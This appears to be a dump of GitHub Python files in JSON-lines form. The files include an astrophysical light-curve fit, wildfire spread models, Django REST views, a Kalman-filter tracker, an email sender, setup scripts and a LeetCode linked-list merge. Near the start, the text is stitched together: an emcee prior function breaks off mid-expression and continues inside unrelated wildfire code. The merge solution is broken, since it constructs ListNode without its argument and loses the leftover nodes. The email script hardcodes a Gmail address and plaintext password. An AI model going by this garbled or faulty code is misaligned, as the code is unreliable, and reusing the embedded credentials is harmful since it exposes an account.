0.40, 25000.0, 10000.0])\npos_lim_max = np.array([0.60, 0.50, 45000.0, 20000.0])\n\n# Setting emcee\nndim = len(pos_lim_min)\nnwalkers = 10 * ndim\nburnin = 500\n\n# Set the initial binary model\nb = phoebe.default_binary()\nb.filter()\nb.add_dataset('lc', times=JD, fluxes=flux, dataset='lc01')\nb.set_value('ld_mode', component='primary', dataset='lc01', value='manual')\nb.set_value('ld_mode', component='secondary', dataset='lc01', value='manual')\nb.set_value('ld_func', component='primary', dataset='lc01', value='logarithmic')\nb.set_value('ld_func', component='secondary', dataset='lc01', value='logarithmic')\nb.set_value_all('ld_mode_bol', value='manual')\nb.set_value('atm@primary@phoebe01@phoebe@compute', value='blackbody')\nb.set_value('atm@secondary@phoebe01@phoebe@compute', value='blackbody')\n\n# Set model and create light curve\ndef LC_sim(params_fit):\n\t(r1, r2, T1, T2) = params_fit\n\tb_model = b\n\tb_model.set_value('requiv', component='primary', value=r1)\n\tb_model.set_value('requiv', component='secondary', value=r2)\n\tb_model.set_value('teff', component='primary', value = T1)\n\tb_model.set_value('teff', component='secondary', value = T2)\n\t\n\t# Compute a model\n\tb_model.run_compute()\n\t\n\tlc_model = b_model.get_value('fluxes@lc@model')\n\tdel b_model\n\treturn lc_model\n\n# Set BC for the prior parameters\ndef lnprior(theta):\n if ((pos_lim_min 0:\n lU = RU\n\n \n R = 0.1 # first guess in iteration\n Rnew = 0\n maxEps = 0.001\n N = 100\n step = 1\n stopcondition = True\n \n flag = 1\n error = 0;\n \n # Packing ratio\n Beta = lsigma / (lh * lrhov)\n #Leaf Area ratio just before eq. 13 S is the total fuel surface area per horizontal area unit of fuel bed and denotes the double of the leaf area index (LAI)\n S = ls * Beta * lh\n #Ignition energy (J/kg) # eq. 9\n q = lCp * (lTi - lTa) + lm * (lDeltah + lCp * (Tvap - lTa))\n # scaling factor eq. 17\n ar = min(S / (2 * math.pi), 1.)\n # Radiative factor # eq. 16\n A = ar * ((lChi0 * lDeltaH) / (4 * q))\n # coefficient p required for T derived from expression between C7 and C8 \n p = (2 / lr00) / ltau0\n \n while stopcondition:\n\n # Radiant fractor eq. C7 \n Chi = lChi0 / (1 + p * ((R * ltau0 * math.cos(lalpha)) / (2 * ls)))\n # Mean Flame Temperature eq. B11\n T = lTa + lDeltaH * ((1 - Chi) / (Cpa * (st + 1)))\n # reference vertical velocity eq. B9\n u0 = 2 * (st + 1) / ltau0 * T / lTa * lrhov / lrhoa * min(S, 2 * math.pi)\n # flame angle\n gamma = math.atan(math.tan(lalpha) + (lU / u0))\n #Flame Height\n H = (u0 ** 2) / (lg * (T / lTa - 1.))\n \n Rb = min((S / math.pi), 1.) * ((B * (T ** 4)) / (Beta * lrhov * q))\n Rc1 = ls * (lDeltaH /(q*ltau0)) * min(lh, (2*math.pi)/(ls*Beta));\n \n Rc2 = (lh/(2*lh+H)) * math.tan(lalpha) + ( (lU*math.exp(-K1*pow(Beta,0.5)*R)) / u0);\n \n Rc = Rc1*Rc2 # eq. 27\n\n Rr = A*R*((1+math.sin(gamma)-math.cos(gamma))/( 1+ ( (R*math.cos(gamma)) / (ls*lr00) )) )# eq. 15\n\n Rnew = Rb+Rc+Rr\n \n error = R-Rnew\n\n R = Rnew\n if (step > N):\n flag=0\n break\n step=step+1\n\t\t\t\n stopcondition = (abs(error) > maxEps);\n\t\n if (flag != 1): \n if print_calculus :\n print(f\"no convergence in {N} steps for Balbi, error is {error}, returning ROS \", Z)\n else:\n print(\".\", end=\"\")\n \n return {\"ROS_mps\":Rnew, \"FllH_m\":H}\n\n\ndef Balbi2011(Z, print_calculus = False):\n \n # Fuel Characteristic Parameters\n lDeltaH = Z.H_Jkg\n lh = Z.fd_m\n lrhov = Z.fuelDens_kgm3\n st = Z.st_r\n ltau0 = Z.Tau0_spm\n lCp = Z.Cpf_JkgK\n \n # Model Parameters\n lDeltah = Z.hEvap_Jkg\n Tvap = Z.Tvap_degK\n Cpa = Z.Cpa_JkgK\n lTi = Z.Ti_degK\n\n # Model fitted parameters\n K1 = Z.K1_spm\n lr00 = Z.r00\n lChi0 = Z.X0\n \n # Constants\n B = Z.B\n lg = Z.g\n \n # Fuel State parameter\n ls = Z.SAV1h_minv\n lsigma = Z.fl1h_kgm2\n lm = Z.mdOnDry1h_r\n \n # Environment parameters\n lTa = Z.Ta_degK\n lalpha = Z.slope_rad\n RU = Z.wind_mps\n lrhoa = Z.airDens_kgm3\n \n \n \n lRhod = Z.fuelDens_kgm3\n lRhol = valueOf[\"Rhol\"]\n lMd = valueOf[\"Md\"]\n lMl = valueOf[\"Ml\"]\n lsd = valueOf[\"sd\"]\n lsl = valueOf[\"sl\"]\n le = valueOf[\"e\"]\n lSigmad = valueOf[\"Sigmad\"]\n lSigmal = valueOf[\"Sigmal\"]\n lstoch = valueOf[\"stoch\"]\n lRhoA = valueOf[\"RhoA\"]\n lTa = valueOf[\"Ta\"]\n lTau0 = valueOf[\"Tau0\"]\n lDeltah = valueOf[\"Deltah\"]\n lDeltaH = valueOf[\"DeltaH\"]\n lCp = valueOf[\"Cp\"]\n lTi = valueOf[\"Ti\"]\n lX0 = valueOf[\"X0\"]\n lr00 = valueOf[\"r00\"]\n lai = valueOf[\"Blai\"]\n \n cosCurv = 1\n \n if le <= 0:\n return 0\n \n Betad = lSigmad / (le * lRhod)\n Betal = lSigmal / (le * lRhol)\n Sd = lsd * le * Betad\n Sl = lsl * le * Betal\n nu = min((Sd) / lai, 1)\n normal_wind = adjustementWind * valueOf[\"normalWind\"]\n B = 5.670373E-8\n a = lDeltah / (lCp * (lTi - lTa))\n r0 = lsd * lr00\n A0 = (lX0 * lDeltaH) / (4 * lCp * (lTi - lTa))\n xsi = ((lMl - lMd) * ((Sd / Sl) * (lDeltah / lDeltaH))) # cf. Santoni et al., 2011\n A = cosCurv * (nu * A0 / (1 + a * lMd)) * (1 - xsi)\n T = lTa + (lDeltaH * (1 - lX0) * (1 - xsi)) / ((lstoch + 1) * Cpa)\n R00 = (B * T ** 4) / (lCp * (lTi - lTa))\n R0 = (le / lSigmad) * (R00) / (1 + a * lMd) * Sd / (Sd + Sl) * Sd / (Sd + Sl)\n u00 = (2 * lai * (lstoch + 1) * T * lRhod) / (lRhoA * lTa * lTau0)\n u0 = nu * u00\n \n tanGamma = adjustementSlope * valueOf[\"slope\"] + (normal_wind / u0)\n gamma = atan(tanGamma)\n \n if gamma > 0:\n geomFactor = r0 / cos(gamma) * (1 + sin(gamma) - cos(gamma))\n Rt = R0 + A * geomFactor - r0 / cos(gamma)\n R = 0.5 * (Rt + sqrt(Rt * Rt + 4. * r0 * R0 / cos(gamma)))\n else:\n R = R0\n \n return R\n\n ","repo_name":"forefireAPI/wildfire_ROS_models","sub_path":"wildfireROS/Balbi2020.py","file_name":"Balbi2020.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72013881795","text":"from django.shortcuts import render\n\n# Create your views here.\n# myapp/views.py\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .models import noisedata\nfrom .models import noiseLocation\nfrom .serializers import noiseDataSerializer\nfrom .serializers import noiseLocationSerializer\n\n@api_view(['GET', 'POST'])\ndef noiseData_list(request):\n if request.method == 'GET':\n noise = noisedata.objects.all()\n serializer = noiseDataSerializer(noise, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = noiseDataSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef noise_detail(request, pk):\n try:\n noise = noisedata.objects.get(pk=pk)\n except noisedata.DoesNotExist:\n return Response(status=404)\n\n if request.method == 'GET':\n serializer = noiseDataSerializer(noise)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = noiseDataSerializer(noise, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n noise.delete()\n return Response(status=204)\n \n\n@api_view(['GET', 'POST'])\ndef noiselocations_list(request):\n if request.method == 'GET':\n locations = noiseLocation.objects.all()\n serializer = noiseLocationSerializer(locations, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = noiseLocationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef noiselocations_detail(request, pk):\n try:\n locations = noiseLocation.objects.get(pk=pk)\n except noiseLocation.DoesNotExist:\n return Response(status=404)\n\n if request.method == 'GET':\n serializer = noiseLocationSerializer(locations)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = noiseLocationSerializer(locations, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n locations.delete()\n return Response(status=204)","repo_name":"Khadar-kr/MDA-Project-New-Zealand","sub_path":"Backend/noiseData/noiseDataRestApi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71192567873","text":"import cv2\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.spatial import distance_matrix\nnp.set_printoptions(precision=3)\n\nclass EKFTracker:\n def __init__(self, x, y, id, max_decay_count) -> None:\n\n dt = 1/40\n self.x = np.array([x, 0, 0, y, 0, 0])\n self.F = np.array([[1, dt, 0.5*dt**2, 0, 0, 0],\n [0, 1, dt, 0, 0, 0],\n [0, 0, 1, 0, 0, 0],\n [0, 0, 0, 1, dt, 0.5*dt**2],\n [0, 0, 0, 0, 1, dt],\n [0, 0, 0, 0, 0, 1]])\n \n self.H = np.array([[1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0]])\n self.dt = dt\n\n self.P = np.eye(self.x.shape[0])\n self.Q = np.array([[0.05, 0, 0, 0, 0, 0],\n [0, 0.03, 0, 0, 0, 0],\n [0, 0, 0.07, 0, 0, 0],\n [0, 0, 0, 0.05, 0, 0],\n [0, 0, 0, 0, 0.03, 0],\n [0, 0, 0, 0, 0, 0.07]])\n # self.Q = np.array([[0, 0, 0, 0, 0, 0],\n # [0, 0, 0, 0, 0, 0],\n # [0, 0, 0, 0, 0, 0],\n # [0, 0, 0, 0, 0, 0],\n # [0, 0, 0, 0, 0, 0],\n # [0, 0, 0, 0, 0, 0]])\n \n self.Q = np.array([[0.05, 0, 0, 0, 0, 0],\n [0, 0.03, 0, 0, 0, 0],\n [0, 0, 0.07, 0, 0, 0],\n [0, 0, 0, 0.05, 0, 0],\n [0, 0, 0, 0, 0.03, 0],\n [0, 0, 0, 0, 0, 0.07]])\n self.R = np.array([[0.02, 0],\n [0, 0.02]])\n self.id = id\n self.age = 0\n self.max_decay_count = max_decay_count\n \n def predict(self):\n self.x = self.F @ self.x\n self.P = self.F @ self.P @ self.F.T + self.Q\n self.age += 1\n validity = True\n if self.age > self.max_decay_count:\n validity = False\n return self.x, validity\n\n def update(self, z):\n S = self.H @ self.P @ self.H.T + self.R\n K = self.P @ self.H.T @ np.linalg.inv(S)\n y = z - self.H @ self.x\n # print(f'Prior P is -> \\n{self.P}')\n # print(f'H @ P @ H.T is -> \\n{S}')\n # print(f'K is -> \\n{K}')\n # print(f'y is -> \\n{y}')\n self.x = self.x + K @ y\n self.P = self.P - K @ self.H @ self.P\n # print(f'Posterior x is -> \\n{self.x}')\n # print(f'Posterior P is -> \\n{self.P}')\n self.age = 0\n return self.x\n\n\nclass Trackers:\n def __init__(self, max_decay_count) -> None:\n self.trackers = {}\n self.id = 0\n self.predicted_states = {}\n self.updated_states = {}\n self.max_decay_count = max_decay_count\n\n def add_tracker(self, x, y):\n self.trackers[self.id] = EKFTracker(x, y, self.id, self.max_decay_count)\n self.predicted_states[self.id] = np.array([x,y])\n self.updated_states[self.id] = np.array([x,y])\n self.id += 1\n\n def associate_and_update(self, z_list):\n predicted_positions_list = [self.predicted_states[key] for key in sorted(self.predicted_states.keys())]\n cost_matrix = distance_matrix(predicted_positions_list, z_list)\n row_indices, col_indices = linear_sum_assignment(cost_matrix)\n for row, col in zip(row_indices, col_indices):\n tracker_id = sorted(self.predicted_states.keys())[row]\n z = z_list[col]\n state = self.trackers[tracker_id].update(z)\n self.updated_states[tracker_id] = np.array([state[0], state[3]])\n if len(col_indices) < len(z_list):\n for col in range(len(z_list)):\n if col not in col_indices:\n x, y = z_list[col]\n self.add_tracker(x, y)\n\n def predict(self):\n delete_ids = []\n for tracker_id in self.trackers:\n state, validity = self.trackers[tracker_id].predict()\n if not validity:\n delete_ids.append(tracker_id)\n else:\n self.predicted_states[tracker_id] = np.array([state[0], state[3]])\n for tracker_id in delete_ids:\n del self.trackers[tracker_id]\n del self.predicted_states[tracker_id]\n del self.updated_states[tracker_id]\n\n def draw_trackers(self, frame):\n for tracker_id in self.trackers:\n predicted_state = self.predicted_states[tracker_id].astype(int)\n radius = 20\n cv2.circle(frame, predicted_state, radius, (0, 255, 0), 2) # Prediction is green\n updated_state = self.updated_states[tracker_id].astype(int)\n cv2.circle(frame, updated_state, radius, (255, 0, 0), 2) # Update is blue\n # Add tracker id using putText\n cv2.putText(frame, str(tracker_id), (int(updated_state[0] + 10), int(updated_state[1] + 10)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n if np.array_equal(predicted_state, updated_state):\n continue\n vec = predicted_state - updated_state\n norm_vec = (vec / np.linalg.norm(vec)).astype(int) * 20\n norm_vec = updated_state + norm_vec\n cv2.arrowedLine(frame, updated_state, norm_vec, (0, 0, 255), 2, tipLength=0.5)\n return frame\n\n def get_tracker(self, tracker_id):\n return self.trackers[tracker_id]\n\n def update_and_predict(self, z_list):\n curr_states = None\n if z_list != []:\n self.associate_and_update(z_list)\n curr_states = self.updated_states\n else:\n curr_states = self.predicted_states\n self.predict()\n return curr_states\n\n","repo_name":"saching13/buoy-tracker","sub_path":"buoy_tracker/buoy_tracker/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71642003395","text":"import cv2\nimport numpy as np\nvideo = cv2.VideoCapture('./sentdexVideos/Intro and loading Images - OpenCV with Python for Image and Video Analysis 1.mp4')\n# Create the background/foreground extractor object\nfgbg = cv2.createBackgroundSubtractorMOG2()\n\nwhile True:\n _, frame = video.read()\n # Apply the extractor on the video frame\n mask = fgbg.apply(frame)\n # Use the extractor frame in order to obtain the feed\n # Which is actively moving/ changing that will be the forground\n # You can also use the not operator to indicate images in the background\n foregroundFrame = cv2.bitwise_and(frame, frame, mask = mask)\n backgroundFrame = cv2.bitwise_and(frame, frame, mask = cv2.bitwise_not(mask))\n cv2.imshow('Video', frame)\n # cv2.imshow('FGBG Mask', mask)\n # cv2.imshow('Foreground Frame', foregroundFrame)\n # cv2.imshow('Background Frame', backgroundFrame)\n k = cv2.waitKey()\n if k == 27 or not _:\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"ElisonSherton/OpenCV-Basic-Programs","sub_path":"bgReduction.py","file_name":"bgReduction.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39196717957","text":"import smtplib\n\ndef textoformatado(string):\n '''\n -> Recebe uma cadeia de strings e devolve-a sem acentos.\n Param string = Cadeia de strings.\n return: NovaCadeiaDeStrings+\"\\n\"\n '''\n string = (string[1:]).strip()\n textinho = ''\n invalidos = ['ã', 'á', 'â', 'à', 'é', 'ê', 'í', 'ó', 'ô', 'ú', 'ç', 'ñ']\n aceitos = ['a', 'a', 'a', 'a', 'eh', 'e', 'i', 'o', 'o', 'u', 'c', 'n']\n for i in string:\n if 127 > ord(i) > 31:\n textinho += i\n else:\n for a in range(len(invalidos)):\n if i == invalidos[a]:\n textinho += aceitos[a]\n return textinho + '\\n'\n\ndef enviar(email, tasks, telegram = 'n'):\n '''\n -> Recebe um email e tarefas e envia para o email desejado.\n Param email = email destino, se nao tiver @, ele adiciona @gmail.com.\n Param tasks = Tarefas numa lista.\n Sem return.\n '''\n if '@' not in email:\n email += '@gmail.com'\n if type(tasks) == list:\n tasks = ''.join([textoformatado(x) for x in tasks])\n usuario = 'todotxtcin@gmail.com' \n senha = 'Python123'\n\n de = usuario \n para = ['todotxtcin@gmail.com', email] \n assunto = 'TODO.TXT Tasks' \n tarefas = tasks\n\n texto = \"\"\"\\ \n De: %s \n Para: %s \n Assunto: %s\n\n%s\n \"\"\" % (de, \", \".join(para), assunto, tarefas)\n try:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.ehlo()\n server.login(usuario, senha)\n server.sendmail(de, para, texto)\n server.close()\n \n if telegram == 'n': \n print ('Email Enviado!')\n else:\n return 'Email Enviado!'\n except: \n if telegram == 'n':\n print ('Alguma coisa deu errado...')\n else:\n return 'Alguma coisa deu errado...'\n","repo_name":"JDaniloC/Projeto-IF968-2019","sub_path":"utils/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71509144513","text":"from setuptools import setup, find_packages\n\n\ndef read(fname):\n with open(fname) as f:\n return f.read()\n\n\nsetup(\n name=\"pyEthioNews\",\n version=\"1.0.3\",\n url=\"https://github.com/wizkiye/pyEthioNewsApi\",\n license=\"MIT\",\n author=\"https://github.com/wizkiye\",\n author_email=\"wizkiye@gmail.com\",\n description=\"Ethiopian News Scraper\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n install_requires=[\n \"httpx\",\n \"bs4\",\n ],\n packages=find_packages(),\n)\n","repo_name":"wizkiye/pyEthioNewsApi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24237393921","text":"import os\nimport json\nimport argparse\nfrom openpyxl import load_workbook\n\nclass WorkSheetNotAvailableError(Exception):\n\n def __init__(self, wb):\n self.message = 'Worksheet is not Avaialble.Available worksheets are \\n {}' \\\n .format('\\n'.join(wb.get_sheet_names()))\n super().__init__(self.message)\n \n\ndef must_have(config):\n '''wrapper to verify the config json file'''\n def _wrapper(key):\n if key not in config:\n raise ValueError('{} is not provided in config file'.format(key))\n else:\n return True\n return _wrapper\n \nclass ExcelExtractor:\n\n @classmethod\n def create_from_cli(cls):\n config = cls._load_args_from_cli()\n self = cls(config)\n \n return self\n\n def __init__(self, config):\n self.config = config\n # get the instance of workbook file\n absolute_path = self.config.get('EXCEL_CONFIG_FILE')\n if not absolute_path or not os.path.exists(absolute_path):\n raise ValueError('Please pass down the valid excel file.')\n # now parse the json file\n self._json_config = json.loads(open(absolute_path).read())\n \n self.requires = must_have(self._json_config)\n \n self._wb = self.requires('filename') and \\\n load_workbook(os.path.expanduser(self._json_config['filename']), data_only=True)\n\n worksheet_name = self.requires('worksheet') and self._json_config['worksheet']\n if worksheet_name not in self._wb.get_sheet_names():\n raise WorkSheetNotAvailableError(self._wb)\n self._worksheet = self._wb[worksheet_name]\n \n \n @classmethod\n def _load_args_from_cli(cls):\n config = {}\n for key, val in vars(cls._get_args_cli()).items():\n if val:\n config['EXCEL_{}'.format(key.upper())] = val\n return config\n \n\n @classmethod\n def _get_args_cli(cls):\n parser = argparse.ArgumentParser(\n description='Excel Sheet Extractor'\n )\n\n parser.add_argument(\n '-c', '--configfile',\n action='store',\n type=str,\n required=True,\n dest='config_file',\n help='Absolute Path to config file'\n )\n parser.add_argument(\n '-o', '--outputfile',\n action='store',\n type=str,\n required=True,\n dest='output_file',\n help='Absolute Path to output file'\n )\n return parser.parse_args()\n\n\n def get_rows(self):\n #this is the generator method that yield all the values from the row for each column\n start_column = self.requires('start_column') and self._json_config['start_column']\n end_column = self.requires('end_column') and self._json_config['end_column']\n \n start_row = self.requires('start_row') and self._json_config['start_row']\n end_row = self.requires('end_row') and self._json_config['end_row']\n\n #column_range = set(map(chr, range(ord(start_column), ord(end_column) + 1)))\n row_range = set(range(int(start_row), int(end_row) + 1))\n\n data_frame = self._worksheet[start_column: end_column]\n # this now has some problem \n #we need to convert it into list\n data_frame = [[cell for cell in w] for w in data_frame]\n\n while all(len(col) > 0 for col in data_frame):\n #all the lenght of col must be non zero\n _result = []\n for r in data_frame:\n _cell = r.pop(0)\n if not _cell.row in row_range:\n continue\n _result.append((_cell.value, _cell.column))\n if _result:\n yield _result\n \n\n def _format_to_dict_list(self):\n #get the input format\n input_format = self.requires('input') and self._json_config['input']\n output_format = self.requires('output') and self._json_config['output']\n if 'format' in self._json_config:\n global_format = self._json_config['format']\n _result = []\n for row in self.get_rows():\n _format = {}\n _input = {}\n _output = {}\n for val, col in row:\n if self._json_config.get('format') and col in global_format:\n _format[global_format[col]] = val\n if col in input_format:\n _input[input_format[col]] = val\n if col in output_format:\n _output[output_format[col]] = val\n _result.append({'input': _input, 'output': _output, 'chunk': _format})\n return _result\n \n def to_json(self):\n if not self.config['EXCEL_OUTPUT_FILE']:\n raise ValueError('Invalid output file')\n file_name = self.config['EXCEL_OUTPUT_FILE']\n result = self._format_to_dict_list()\n with open(file_name, mode='w') as file:\n file.write(json.dumps(result))\n\n \n\n\n\n \n\n\nif __name__ == '__main__':\n e = ExcelExtractor.create_from_cli()\n e.to_json()\n \n ","repo_name":"RobusGauli/xlsx-extractor","sub_path":"excel_extract.py","file_name":"excel_extract.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37250901071","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = [\n 'Django'\n]\n\nsetup(\n name='django_reciprocity',\n version='0.0.1',\n description=\"Interactive web apps with Django\",\n long_description=readme + '\\n\\n' + history,\n author=\"Michał Pasternak\",\n author_email='michal.dtz@gmail.com',\n url='https://github.com/mpasternak/django-reciprocity',\n packages=[\n 'reciprocity',\n ],\n package_dir={'reciprocity': 'reciprocity'},\n include_package_data=True,\n install_requires=requirements,\n license=\"MIT license\",\n zip_safe=False,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.7',\n ],\n)\n","repo_name":"mpasternak/django-reciprocity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30113478282","text":"\"\"\"Incomplete file with only the predicates we use in our mappings\"\"\"\nimport dateutil.parser\nfrom .querier import querier, var, BLANK\nfrom ..utils import parsetime\n\n\n@querier.prov(\"entity\", [\"id\", \"text\"])\ndef entity(querier, eid, attrs={}, id_=None):\n return [\n eid,\n querier.text(\"entity\", [eid], attrs, id_)\n ]\n\n\n@querier.prov(\"activity\", [\"id\", \"start\", \"end\", \"text\"])\ndef activity(dot, aid, start_time=None, end_time=None, attrs=None, id_=None):\n start = parsetime(start_time)\n end = parsetime(end_time)\n return [\n aid, start, end,\n querier.text(\"activity\", [aid, start_time, end_time], attrs, id_)\n ]\n\n\n@querier.prov(\"used\", [\"id\", \"activity\", \"entity\", \"time\", \"text\"])\ndef used(dot, aid, eid=None, time=None, attrs=None, id_=None):\n ti = parsetime(time)\n return [\n id_, aid, eid, ti,\n querier.text(\"used\", [aid, eid, time], attrs, id_)\n ]\n\n\n@querier.prov(\"wasDerivedFrom\", [\"generated\", \"used\", \"activity\", \"generation\", \"use\", \"attrs\", \"text\"])\ndef wasDerivedFrom(dot, egenerated=None, eused=None, aid=None, gid=None, uid=None, attrs=None, id_=None):\n return [\n egenerated, eused, aid, gid, uid,\n attrs or {}, querier.text(\n \"wasDerivedFrom\",\n [egenerated, eused, aid, gid, uid], attrs, id_\n )\n ]\n\n\n@querier.prov(\"wasGeneratedBy\", [\"id\", \"entity\", \"activity\", \"time\", \"text\"])\ndef wasGeneratedBy(dot, eid, aid=None, time=None, attrs=None, id_=None):\n ti = parsetime(time)\n return [\n id_, eid, aid, ti,\n querier.text(\"wasGeneratedBy\", [eid, aid, time], attrs, id_)\n ]\n\n\n@querier.prov(\"hadMember\", [\"collection\", \"entity\", \"text\"])\ndef hadMember(dot, ecollection=None, eid=None, attrs=None, id_=None):\n return [\n ecollection, eid,\n querier.text(\"hadMember\", [ecollection, eid], attrs, id_)\n ]\n\n\n@querier.prov(\"specializationOf\", [\"specific\", \"general\", \"text\"])\ndef specializationOf(dot, specific=None, general=None, attrs=None, id_=None):\n return [\n specific, general,\n querier.text(\"specializationOf\", [specific, general], attrs, id_)\n ]\n","repo_name":"JoaoFelipe/extensible_provn","sub_path":"extensible_provn/query/provn.py","file_name":"provn.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9546273529","text":"#!/usr/bin/env python\n\nimport serial\nimport sys\nfrom DG1022 import *\nimport usbtmc\n\nser = serial.Serial('/dev/ttyUSB0', baudrate=19200, bytesize=7,parity='O', stopbits=1, timeout=3)\n\ndef ut61e_get_mv(s):\n s.reset_input_buffer()\n line = s.readline()\n line = s.readline()\n #print(line)\n mv = float(line[1:6])/100\n return mv\n\ndev_DG = usbtmc.Instrument(0x1ab1, 0x0642)\ndev_DG.timeout = 0.1\ntry:\n print(dev_DG.ask(\"*IDN?\"))\nexcept:\n dev_DG.close()\n dev_DG = usbtmc.Instrument(0x1ab1, 0x0642)\n dev_DG.timeout = 0.1\n print(dev_DG.ask(\"*IDN?\"))\n\nr = RigolDG(dev_DG)\n\nr.SetImpedance(1, 50)\nr.SetAmplitude(1, -30)\nr.SetFrequency(1, 25000000)\nr.SetEnabled(1, True)\n \nfor dbm in range(-30, 17):\n r.SetAmplitude(1, dbm)\n sleep(2)\n mv = ut61e_get_mv(ser)\n print(\"%f;%f\"%(dbm, mv))\n","repo_name":"jankae/SpectrumAnalyzer","sub_path":"Experiments/03_mixer_gain/rf_detector_baseline.py","file_name":"rf_detector_baseline.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"24428319234","text":"from bottle import route, request, run, Bottle, abort\nfrom dateutil.rrule import *\nfrom dateutil.parser import parse\n\nicalws_app = Bottle()\n\n@icalws_app.route('/nextdates')\ndef nextdates():\n if \"dtstart\" not in request.query:\n abort(400, \"Missing dtstart\")\n if \"rrule\" not in request.query:\n abort(400, \"Missing rrule\")\n \n rdates = list(rrulestr(request.query.rrule, dtstart=parse(request.query.dtstart)))\n res = {\n \"dates\":[]\n }\n for date in rdates:\n res[\"dates\"].append(date.strftime('%Y%m%dT%H%M%SZ'))\n \n return res\n\nif __name__ == \"__main__\":\n run(app=icalws_app, host='localhost', port=8080, debug=True, reloader=True)\n","repo_name":"coderbyheart/icalws","sub_path":"icalws.py","file_name":"icalws.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32981004827","text":"# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.\n#\n# Example:\n#\n# Input: 1->2->4, 1->3->4\n# Output: 1->1->2->3->4->4\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n if l1 is None and l2 is None:\n return None\n if l1 is None:\n return l2\n if l2 is None:\n return l1\n\n result = ListNode()\n point = result\n while l1 is not None and l2 is not None:\n if l1 is None and l2 is not None:\n point.next = l2\n l2 = l2.next\n elif l1 is not None and l2 is None:\n point.next = l1\n l1 = l1.next\n elif l1.val <= l2.val:\n point.next = l1\n l1 = l1.next\n else:\n point.next = l2\n l2 = l2.next\n return result.next\n\n\n # best solution\n # res = dummy = ListNode(0)\n\n # while l1 and l2:\n # if l1.val < l2.val:\n # res.next = l1\n # l1 = l1.next\n # else:\n # res.next = l2\n # l2 = l2.next\n # res = res.next\n\n # res.next = l1 or l2\n # return dummy.next\n","repo_name":"yshshadow/Leetcode","sub_path":"1-50/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12884135878","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\nassert len(sys.argv) >= 2\n\ncell_line_to_rm = sys.argv[1]\n\ncell_lines = [\"MDA-231\",\n \"MDA-157\",\n \"MCF7\",\n \"KPL4\",\n \"SKBR3\",\n \"T47D\",\n \"HCC1954\",\n \"HCC1569\"]\n\nif cell_line_to_rm not in cell_lines:\n raise ValueError(\"unknwown cell-line, options are :{}\".format(cell_lines))\n\ncell_lines.remove(cell_line_to_rm)\n\nEXISTING_DIR = \"/exports/igmm/datastore/Drug-Discovery/scott/2018-04-24_nncell_data_300_{}/\"\n\nNEW_DIR_NAME = 